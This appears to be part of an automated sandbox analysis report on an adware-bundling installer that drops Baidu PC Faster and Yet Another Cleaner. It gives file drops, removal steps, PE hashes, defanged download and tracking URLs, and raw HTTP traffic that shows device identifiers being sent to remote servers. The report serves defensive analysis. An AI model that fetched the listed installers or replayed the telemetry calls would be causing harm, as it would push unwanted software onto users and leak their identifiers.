%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\msgbox.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\feedback_btn_bk.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\arrow_down.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\arrow_up.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_combo_skin.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_prompt.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\av_authority_bk.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_uncheck.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scanview_btn_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_unchecked.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_faq_icon.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\install.xml (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyBB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\tipsWnd.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_logo.png (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\yac_side_ico.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_complete.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_indeterminate.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\switch_button_off.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_checked.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_scanning.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_block.png (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_bk.png (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\soft_cof_button_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\nsis_setup (16503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_dlg_bk.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_indeteminate.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\nation_icon_list.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\setup.7z (3204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\pvb_line.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\vscroll.png (1 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Baidu PC Faster 4.0.0.0" = "%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe -auto -start" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: Setup Factory Runtime
Product Version: 9.1.0.0
Legal Copyright: Setup Engine Copyright (c) 2004-2012 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf_launch.exe
Internal Name: suf_launch
File Version: 9.1.0.0
File Description: Setup Application
Comments: Created with Setup Factory
Language: Language Neutral
Company Name: Product Name: Setup Factory RuntimeProduct Version: 9.1.0.0Legal Copyright: Setup Engine Copyright (c) 2004-2012 Indigo Rose CorporationLegal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.Original Filename: suf_launch.exeInternal Name: suf_launchFile Version: 9.1.0.0File Description: Setup ApplicationComments: Created with Setup FactoryLanguage: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 22296 | 22528 | 4.47735 | c76b9ce587690b8a39ba7840b7dd540c |
| .rdata | 28672 | 11906 | 12288 | 3.44864 | e96aa4f970e6f6799910a72904df3100 |
| .data | 40960 | 6504 | 3072 | 1.79291 | e504fdbba062ee9bbd9ac425a4f5c0f5 |
| .rsrc | 49152 | 28108 | 28160 | 4.03415 | f07da938ca4a81c16d34f6b033be873e |
| .reloc | 77824 | 4242 | 4608 | 2.5731 | a88bdb6f651ecf67b1b3db4a2866ea4e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 6
2561ffa6912df85a0bb87432895cb317
67c85984484428b9cd1659116ebc5199
65b999a993292069baf5f7941015acdc
8f3435b2e0eb81c9a66e6701811caf9d
cff88f12e54579f4fe5db5c960fea71f
883a6af17dfd2e3fde85bf03e2548a5c
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://prova.adspirit.de/adclick.php?pid=7026&wmid=4361&chc=1?= | |
| hxxp://trk2it1.com/?a=10577&oc=1837&c=8086&s1=&s1=8909&s2=ap7026w4361t1419090121 | |
| hxxp://trk2it1.com/?a=10577&oc=1837&c=8086&s1=&s1=8909&s2=ap7026w4361t1419090121&ckmguid=fe51e140-bf10-4736-9486-c2beb18e2817 | |
| hxxp://pcfhome.wshifen.com/pt/?da=1&REQUEST_ID=144327560 | |
| hxxp://cyberdados.com/pcfaster/pcfaster.php | |
| hxxp://pcfhome.wshifen.com/cgi/s2s/dl.php?cr=&lang=pt&ptn=da&host=http://dl-vip.pcfaster.baidu.com/&sid=144327560 | |
| hxxp://prova.adspirit.de/adclick.php?pid=7026&wmid=15657&chc=1?= | |
| hxxp://network.adsmarket.com/click/iWdslmfKe5mKZmrEXsp6w4pkaZhfnH6Vt2dsnWege8OJY2yWXpypnY1kaZ1f?dp=ap7026w15657t1419090125&dp2=8909&dp3="%local server IP%" | 193.169.104.1 |
| hxxp://s2s.yac.mx/ads/adsavess?sid=yac&ptid=mat&subid=123101&clickID=20Bxhl1vJnZ4PiAA3noevs1y2mau000.&lplink=hxxp://www.yac.mx/ssc/yac.php?pt=mat&pubid=16319&ce_cid=20Bxhl1vJnZ4PiAA3noevs1y2mau000. | 50.97.45.26 |
| hxxp://www.yac.mx/ssc/yac.php?pt=mat | 184.173.128.179 |
| hxxp://www.yac.mx/download/config/down.php?pt=mat | 184.173.128.179 |
| hxxp://75.126.133.150/download/dl/yet_another_cleaner_mat.exe | |
| hxxp://sync.pcfaster.baidu.com.eg/cgi-bin-py/mini_install_statistic_info.cgi | 185.10.107.72 |
| hxxp://www.a.shifen.com/ | |
| hxxp://speedtest.wshifen.com/opencgi/downinfo.php?m=start_download&i=e939675892611217d37e7da12c55d0371419090132&s=63.217.158.157&u=hxxp://download.pcfaster.baidu.com.eg/newver_B104.xml&t=2014/12/20 12:32:52&v=4.0.0.80846&p=0&speed=0&code=20000 | 63.217.158.146 |
| hxxp://xa.xingcloud.com/v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=application.exit.vm | 65.255.35.150 |
| hxxp://xa.xingcloud.com/v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=application.start | 65.255.35.150 |
| hxxp://www.yac.mx/download/config/db.php?action=returnjson&name=yet_another_cleaner_mat.exe | 184.173.128.179 |
| hxxp://xa.xingcloud.com/v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=visit.start&update0=ref,banner&update1=nation,us&update2=language,en&update3=version,1.0.75&update4=ref1,mat&update5=os,winxp | 65.255.35.150 |
| hxxp://pcfaster-down-eg.wshifen.com/newver_B104.xml?userid={e939675892611217d37e7da12c55d037}&rand=666B747F | |
| hxxp://xa.xingcloud.com/v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=download.start | 65.255.35.150 |
| hxxp://s2s.yac.mx/dl.php?file=/download/ds/yac.exe | 50.97.45.26 |
| hxxp://speedtest.wshifen.com/opencgi/downinfo.php?m=end_download&i=e939675892611217d37e7da12c55d0371419090132&s=63.217.158.157&u=hxxp://download.pcfaster.baidu.com.eg/newver_B104.xml&t=2014/12/20 12:32:55&v=4.0.0.80846&p=10000&speed=4541&code=30000 | 63.217.158.146 |
| hxxp://dl2.yac.mx/download/ds/yac.exe | 75.126.133.148 |
| hxxp://speedtest.wshifen.com/opencgi/downinfo.php?m=start_download&i=e939675892611217d37e7da12c55d0371419090137&s=63.217.158.141&u=hxxp://dl2.security.baidu.co.th/PC_Faster_Setup_B104.exe&t=2014/12/20 12:32:57&v=4.0.0.80846&p=0&speed=0&code=20000 | 63.217.158.146 |
| hxxp://pcfaster-down-th.wshifen.com/PC_Faster_Setup_B104.exe?userid={e939675892611217d37e7da12c55d037}&rand=666B747F | |
| hxxp://xa.xingcloud.com/v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=download.success | 65.255.35.150 |
| hxxp://xa.xingcloud.com/v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=install.start | 65.255.35.150 |
| hxxp://xa.xingcloud.com/v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=install.finish | 65.255.35.150 |
| hxxp://speedtest.wshifen.com/opencgi/downinfo.php?m=end_download&i=e939675892611217d37e7da12c55d0371419090137&s=63.217.158.141&u=hxxp://dl2.security.baidu.co.th/PC_Faster_Setup_B104.exe&t=2014/12/20 12:33:14&v=4.0.0.80846&p=10000&speed=1522468&code=30000 | 63.217.158.146 |
| hxxp://pcfhome.wshifen.com/cgi/ip/getCode.php | |
| hxxp://sync.pcfaster.baidu.com.eg/cgi-bin-py/get_channel_info.cgi?install_channel=DirectAgents|br|IBD|Banner&version=5.0.4.87531&errorcode=0&errortext=&userid=e939675892611217d37e7da12c55d037&old_userid=00000000-000C296817BB!00cc44a8-0bfd-4d1a-8e7a-474529635d9e@#000C296817BB&install_time=2014-12-20 10:33:18&install_time_num=1419064398&cost_time=38&file_created_time=2014-12-20 10:32:59 | 185.10.107.72 |
| hxxp://sync.security.baidu.co.th/cgi-bin-py/get_channel_info.cgi?install_channel=DirectAgents|br|IBD|Banner&version=5.0.4.87531&errorcode=0&errortext=&userid=e939675892611217d37e7da12c55d037&old_userid=00000000-000C296817BB!00cc44a8-0bfd-4d1a-8e7a-474529635d9e@#000C296817BB&install_time=2014-12-20 10:33:18&install_time_num=1419064398&cost_time=38&file_created_time=2014-12-20 10:32:59 | 180.76.2.169 |
| hxxp://sync.pcfaster.baidu.com.eg/cgi-bin-py/get_pcf_statistic_info.cgi | 185.10.107.72 |
| hxxp://sync.pcfaster.baidu.com.eg/cgi-bin/get_security_client_update_info.cgi?ChannelName=DirectAgents|br|IBD|Banner&DataVersion=2014.09.25.101556&FilesCompleteness=no&guid=e939675892611217d37e7da12c55d037&Ismanual=no&IsPro=pcf&os=5.1.2600&svr=0&cpu=32&lang=0409&ProgramVersion=5.0.4.87531 | 185.10.107.72 |
| hxxp://pcf-updown-th.wshifen.com/5.0.7.99579/baidu_update/FileList.xml.7z | |
| hxxp://sync.security.baidu.co.th/cgi-bin-py/predup.cgi?p=10&id=S-1-5-21-1844237615-1960408961-1801674531-1003#000C296817BB&d=undefined&Ch=undefined&Pr=01 | 180.76.2.169 |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/DataFileVer.xml | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/DataFileList.xml.7z | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/url.ini-0x230ff48ccb9a7fa5cd6da5797287963a.diff | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/CloudOPTClient.exe-0x97675745b0ee49bde212be051e310f99.diff | |
| hxxp://pcfhome.wshifen.com/cgi/s2s/statistic.php?sid=144327560&channel=DirectAgents|br|IBD|Banner&uid=e939675892611217d37e7da12c55d037 | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/WiFiMac.dat.7z | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/WiFiNpc.dat.7z | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/Plugins/Plugin.LeakRepair/LeakDB-x86-1033.dat | |
| hxxp://trk2it1.com/p.ashx?o=30674&f=pb&r=144327560&t=e939675892611217d37e7da12c55d037 | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/Plugins/Plugin.Optimizer/SysOpt/optlist.dat-0x0d834fc92c5eeedc70c799e68d92bc1d.diff | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/AudioList.dat.7z | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/BrowserList.dat.7z | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/PhotoList.dat.7z | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/VideoList.dat.7z | |
| hxxp://pcf-updown-th.wshifen.com/pcf_data/2014.12.09.115357/GameList.xml.7z | |
| hxxp://pcf-updown-th.wshifen.com/5.0.7.99579/baidu_update/BaiduStore.dll.7z | |
| hxxp://pcf-updown-th.wshifen.com/5.0.7.99579/baidu_update/BavConfig.ini.7z | |
| hxxp://pcf-updown-th.wshifen.com/5.0.7.99579/baidu_update/BavData.dll.7z | |
| hxxp://pcf-updown-th.wshifen.com/5.0.7.99579/baidu_update/bdMiniDownloaderNoUITH_PCF-Mini.exe-0x28c94e73ef2c18ee861292961f5add28.diff | |
| hxxp://pcf-updown-th.wshifen.com/5.0.7.99579/baidu_update/bdMiniDownloaderNoUITH_PCF-Mini.exe.7z | |
| hxxp://dl2.security.baidu.co.th/PC_Faster_Setup_B104.exe?userid={e939675892611217d37e7da12c55d037}&rand=666B747F | 63.217.158.141 |
| hxxp://updown.pcfaster.baidu.co.th/5.0.7.99579/baidu_update/BaiduStore.dll.7z | 180.76.10.142 |
| hxxp://www.pcfaster.com/cgi/s2s/statistic.php?sid=144327560&channel=DirectAgents|br|IBD|Banner&uid=e939675892611217d37e7da12c55d037 | 63.217.158.102 |
| hxxp://www.pcfaster.com/cgi/s2s/dl.php?cr=&lang=pt&ptn=da&host=http://dl-vip.pcfaster.baidu.com/&sid=144327560 | 63.217.158.102 |
| hxxp://updown.pcfaster.baidu.co.th/5.0.7.99579/baidu_update/BavConfig.ini.7z | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/CloudOPTClient.exe-0x97675745b0ee49bde212be051e310f99.diff | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/5.0.7.99579/baidu_update/BavData.dll.7z | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/DataFileList.xml.7z | 180.76.10.142 |
| hxxp://sync.bav.baidu.com/cgi-bin-py/predup.cgi?p=10&id=S-1-5-21-1844237615-1960408961-1801674531-1003#000C296817BB&d=undefined&Ch=undefined&Pr=01 | 180.76.2.169 |
| hxxp://pcfaster.baidu.com.eg/cgi/ip/getCode.php | |
| hxxp://download.pcfaster.baidu.com.eg/newver_B104.xml?userid={e939675892611217d37e7da12c55d037}&rand=666B747F | 63.217.158.157 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/WiFiNpc.dat.7z | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/Plugins/Plugin.LeakRepair/LeakDB-x86-1033.dat | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/url.ini-0x230ff48ccb9a7fa5cd6da5797287963a.diff | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/PhotoList.dat.7z | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/AudioList.dat.7z | 180.76.10.142 |
| hxxp://smarttrk.com/?a=10577&oc=1837&c=8086&s1=&s1=8909&s2=ap7026w4361t1419090121&ckmguid=fe51e140-bf10-4736-9486-c2beb18e2817 | 50.56.163.59 |
| hxxp://smarttrk.com/p.ashx?o=30674&f=pb&r=144327560&t=e939675892611217d37e7da12c55d037 | 50.56.163.59 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/Plugins/Plugin.Optimizer/SysOpt/optlist.dat-0x0d834fc92c5eeedc70c799e68d92bc1d.diff | 180.76.10.142 |
| hxxp://ads.sprintrade.com/adclick.php?pid=7026&wmid=4361&chc=1?= | |
| hxxp://ads.sprintrade.com/adclick.php?pid=7026&wmid=15657&chc=1?= | |
| hxxp://update.pcfaster.baidu.com.eg/cgi-bin/get_security_client_update_info.cgi?ChannelName=DirectAgents|br|IBD|Banner&DataVersion=2014.09.25.101556&FilesCompleteness=no&guid=e939675892611217d37e7da12c55d037&Ismanual=no&IsPro=pcf&os=5.1.2600&svr=0&cpu=32&lang=0409&ProgramVersion=5.0.4.87531 | 185.10.107.72 |
| hxxp://updown.pcfaster.baidu.co.th/5.0.7.99579/baidu_update/bdMiniDownloaderNoUITH_PCF-Mini.exe.7z | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/5.0.7.99579/baidu_update/FileList.xml.7z | 180.76.10.142 |
| hxxp://184.173.128.179/download/config/db.php?action=returnjson&name=yet_another_cleaner_mat.exe | |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/DataFileVer.xml | 180.76.10.142 |
| hxxp://www.baidu.com/ | 180.76.3.151 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/WiFiMac.dat.7z | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/5.0.7.99579/baidu_update/bdMiniDownloaderNoUITH_PCF-Mini.exe-0x28c94e73ef2c18ee861292961f5add28.diff | 180.76.10.142 |
| hxxp://rd.yac.mx/dl.php?file=/download/ds/yac.exe | 50.97.45.26 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/BrowserList.dat.7z | 180.76.10.142 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/GameList.xml.7z | 180.76.10.142 |
| hxxp://www.pcfaster.com/pt/?da=1&REQUEST_ID=144327560 | 63.217.158.102 |
| hxxp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357/Plugins/Plugin.Tools/DefaultPrograms/VideoList.dat.7z | 180.76.10.142 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /cgi-bin-py/mini_install_statistic_info.cgi HTTP/1.1
Accept: */*
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=------670966d3ab674b7e82430a42a7a41b3a
User-Agent: BaiduIS/1.0
Host: sync.pcfaster.baidu.com.eg
Content-Length: 920
Connection: Keep-Alive
--------670966d3ab674b7e82430a42a7a41b3a
Content-Disposition: form-data; name="ufile01"; filename="rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0154-[7431].dat"
Content-Type: application/octet-stream
.......;......!...{.e.9.3.9.6.7.5.8.9.2.6.1.1.2.1.7.d.3.7.e.7.d.a.1.2.c.5.5.d.0.3.7.}...........................................................................................................................................................................................M.s...a..............b..............i....F..... .6.8.d.5.0.9.8.7.c.a.3.7.1.8.f.7.6.f.6.6.6.c.a.3.e.d.4.5.f.1.2.5...j............2.1.7.6.8.4.0.0...p..........H.0.0.0.0.0.0.0.0.-.0.0.0.C.2.9.6.8.1.7.B.B.!.0.0.c.c.4.4.a.8.-.0.b.f.d.-.4.d.1.a.-.8.e.7.a.-.4.7.4.5.2.9.6.3.5.d.9.e.@.#.0.0.0.C.2.9.6.8.1.7.B.B..........D.i.r.e.c.t.A.g.e.n.t.s.|.b.r.|.I.B.D.|.B.a.n.n.e.r..........A...
--------670966d3ab674b7e82430a42a7a41b3a--
HTTP/1.1 200 OK
Server: nginx/1.3.9
Date: Sat, 20 Dec 2014 15:42:35 GMT
Content-Type: text/plain
Content-Length: 7
Connection: Keep-Alive
success..
GET /cgi/s2s/statistic.php?sid=144327560&channel=DirectAgents|br|IBD|Banner&uid=e939675892611217d37e7da12c55d037 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.pcfaster.com
Connection: Keep-Alive
Cookie: ptn=da
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:43:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 252
Connection: Keep-Alive
Content-Type: text/html
...........Q=S.0...WD.F... .&X....X.. .G.,................[qv.p.{z.'...f#B DtV..dI....N.dQF3.....u.=.l#h..7i.G...w....,.."I;;..w...`q.G.f{..... ......-.;m'.h.u........^...:&j.^o.di.....>.....yY.1J[.......,.3n....,.eiR...............'..jI.~...7.Dx........
GET /cgi-bin-py/get_channel_info.cgi?install_channel=DirectAgents|br|IBD|Banner&version=5.0.4.87531&errorcode=0&errortext=&userid=e939675892611217d37e7da12c55d037&old_userid=00000000-000C296817BB!00cc44a8-0bfd-4d1a-8e7a-474529635d9e@#000C296817BB&install_time=2014-12-20 10:33:18&install_time_num=1419064398&cost_time=38&file_created_time=2014-12-20 10:32:59 HTTP/1.1
Accept: */*
Cache-Control: no-cache
Host: sync.security.baidu.co.th
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 22
Content-Type: text/html;charset=utf-8
Connection: Keep-Alive
upload channel info ok..
GET /click/iWdslmfKe5mKZmrEXsp6w4pkaZhfnH6Vt2dsnWege8OJY2yWXpypnY1kaZ1f?dp=ap7026w15657t1419090125&dp2=8909&dp3="%local server IP%" HTTP/1.1
Accept: */*
User-Agent: Setup Factory 8.0
Connection: Keep-Alive
Cache-Control: no-cache
Host: network.adsmarket.com
HTTP/1.1 302 Found
Date: Sat, 20 Dec 2014 15:42:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=1ui2fujtfaqcao0hu836k2lnm1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ce-visitor-iWNsll6c=imF73ZbXe9qin5OZftSLpYufqMqk3nvdip6a2l6bepI; expires=Tue, 03-Feb-2015 15:42:10 GMT; path=/; domain=network.adsmarket.com
Set-Cookie: ce-click-kGptm16hfcOLYXKZXp2DnI5j=kGptm16hfcOLYXKZXp2DnI5j; expires=Sun, 21-Dec-2014 15:42:10 GMT; path=/; domain=network.adsmarket.com
Location: hXXp://s2s.yac.mx/ads/adsavess?sid=yac&ptid=mat&subid=123101&clickID=20Bxhl1vJnZ4PiAA3noevs1y2mau000.&lplink=hXXp://VVV.yac.mx/ssc/yac.php?pt=mat&pubid=16319&ce_cid=20Bxhl1vJnZ4PiAA3noevs1y2mau000.
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Length: 0
Keep-Alive: timeout=15, max=1964
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET /v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=download.success HTTP/1.1
Host: xa.xingcloud.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 20 Dec 2014 15:42:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.71 ms","message":"store 1 action and 0 update "}..0......
GET /v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=install.start HTTP/1.1
Host: xa.xingcloud.com
Cache-Control: no-cache
GET /v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=install.finish HTTP/1.1
Host: xa.xingcloud.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 20 Dec 2014 15:42:31 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.64 ms","message":"store 1 action and 0 update "}..0..
GET /v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=application.start HTTP/1.1
Host: xa.xingcloud.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 20 Dec 2014 15:42:14 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.70 ms","message":"store 1 action and 0 update "}..0......
GET /v4/yac-newdl/vmwarexvirtualxidexhardxdrive_00000000000000000001?action=visit.start&update0=ref,banner&update1=nation,us&update2=language,en&update3=version,1.0.75&update4=ref1,mat&update5=os,winxp HTTP/1.1
Host: xa.xingcloud.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 20 Dec 2014 15:42:14 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.87 ms","message":"store 2 action and 6 update "}..0..
GET /cgi-bin/get_security_client_update_info.cgi?ChannelName=DirectAgents|br|IBD|Banner&DataVersion=2014.09.25.101556&FilesCompleteness=no&guid=e939675892611217d37e7da12c55d037&Ismanual=no&IsPro=pcf&os=5.1.2600&svr=0&cpu=32&lang=0409&ProgramVersion=5.0.4.87531 HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: 5.0.4.87531
Host: update.pcfaster.baidu.com.eg
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:43:43 GMT
Server: Apache
Content-Length: 422
Connection: Keep-Alive
Content-Type: text/plain
<?xml version="1.0" encoding="utf-8"?><ServerRespond XmlVersion="1.0"><Version>5.0.7.99579</Version><UpdateProgram Md5="0xda2f6841a2757dca21a04e5040daeefb" NeedUpdate="Yes" Size="346394" Url="hXXp://updown.pcfaster.baidu.co.th/5.0.7.99579/baidu_update"/><UpdateData Md5="0x966a83cac9e65ee2467d7a8b07b9683c" NeedUpdate="Yes" Size="16704" Url="hXXp://updown.pcfaster.baidu.co.th/pcf_data/2014.12.09.115357"/></ServerRespond>..
GET /cgi-bin-py/predup.cgi?p=10&id=S-1-5-21-1844237615-1960408961-1801674531-1003#000C296817BB&d=undefined&Ch=undefined&Pr=01 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: sync.bav.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:43:45 GMT
Server: Apache
Content-Length: 21
Connection: Keep-Alive
Content-Type: application/octet-stream
upload predup info ok..
GET /pt/?da=1&REQUEST_ID=144327560 HTTP/1.1
Accept: */*
Host: VVV.pcfaster.com
User-Agent: Setup Factory 8.0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 15:42:05 GMT
Server: Apache
Set-Cookie: ptn=da; expires=Sun, 21-Dec-2014 15:42:05 GMT; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
